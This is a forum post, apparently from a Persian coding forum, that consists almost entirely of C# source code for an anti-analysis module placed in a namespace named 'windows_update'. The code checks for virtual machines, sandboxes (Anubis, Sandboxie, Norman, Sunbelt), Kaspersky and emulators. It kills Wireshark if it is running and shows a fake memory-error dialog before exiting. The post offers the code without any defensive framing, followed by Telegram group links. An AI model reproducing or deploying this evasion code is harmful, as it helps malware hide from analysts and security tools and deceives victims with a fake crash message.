08-30-2011، 12:36 PM
کد:
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
using System.Windows.Forms;
using Microsoft.Win32;
namespace windows_update
{
internal class AntiDebug
{
public static void CheckDebug()
{
if (AntiVirtualPC())
Detected();
else if (AntiAnubis())
Detected();
else if (AntiAnubis2())
Detected();
else if (AntiKAV())
Detected();
else if (AntiSandboxie())
Detected();
else if (AntiEmulator())
Detected();
else if (AntiNorman())
Detected();
else if (AntiWireShark())
Detected();
else if (AntiVirtualBox())
Detected();
else if (AntiSunbelt())
Detected();
}
private static void Detected()
{
MessageBox.Show(
"Application Error: The instruction at \"0x78ec83b4\" referenced memory at \"0x00405467\". The memory could not be \"read\".",
"Critical Error!", MessageBoxButtons.OK, MessageBoxIcon.Error);
Environment.Exit(0);
}
private static bool AntiVirtualBox()
{
if (prcIsRunning("VBoxService"))
return true;
else
return false;
}
private static bool AntiSunbelt()
{
if (Directory.Exists("C:\\analysis"))
return true;
else
return false;
}
private static bool AntiWireShark()
{
if (prcIsRunning("wireshark.exe"))
{
killProcess("wireshark.exe");
return true;
}
else
return false;
}
private static bool AntiNorman()
{
if (Environment.UserName == "currentuser")
return true;
else
return false;
}
//Credit: ChainCoder
private static bool AntiEmulator()
{
bool functionReturnValue = false;
long timenow = 0;
long timeaftersleep = 0;
//Assign long timenow to get the milliseconds passed before app being suspended.
//Tickcount before sleep
timenow = Environment.TickCount;
//Sleeps half a second
Thread.Sleep(500);
//Tickcount after sleep
timeaftersleep = Environment.TickCount;
if (timeaftersleep - timenow < 500)
functionReturnValue = true;
else
functionReturnValue = false;
return functionReturnValue;
}
private static bool AntiSandboxie()
{
if (Process.GetProcessesByName("SbieSvc").Length >= 1 | Process.GetProcessesByName("sniff_hit").Length >= 1 |
Process.GetProcessesByName("sysAnalyzer").Length >= 1)
return true;
else
return false;
}
private static bool AntiKAV()
{
if (Process.GetProcessesByName("avp").Length >= 1)
return true;
else
return false;
}
private static bool AntiAnubis()
{
string folder = Application.StartupPath;
string getFile = folder + "\\sample.exe";
if (Application.ExecutablePath == getFile)
return true;
else
return false;
}
private static bool AntiAnubis2()
{
//Anubis Info -
//PRODUCT ID/KEY: 76487-337-8429955-22614
//MACHINEGUID: e575b6fd-1714-411e-8f6a-4c469796e816
RegistryKey regPID = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
false);
object pid = regPID.GetValue("ProductId");
string id = "76487-337-8429955-22614";
if ((string) pid == id)
return true;
else
return false;
}
private static bool AntiVirtualPC()
{
if (Process.GetProcessesByName("vpcmap").Length >= 4 & Process.GetProcessesByName("vmsrvc").Length >= 4)
{
return true;
}
else if (Process.GetProcessesByName("vmusrvc").Length >= 4)
{
return true;
}
return false;
}
public static bool prcIsRunning(string process)
{
foreach (Process p in Process.GetProcesses())
if (p.ProcessName == process)
return true;
return false;
}
public static void killProcess(string process)
{
foreach (Process p in Process.GetProcesses())
if (p.ProcessName.Equals(process))
p.Kill();
}
}
}
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg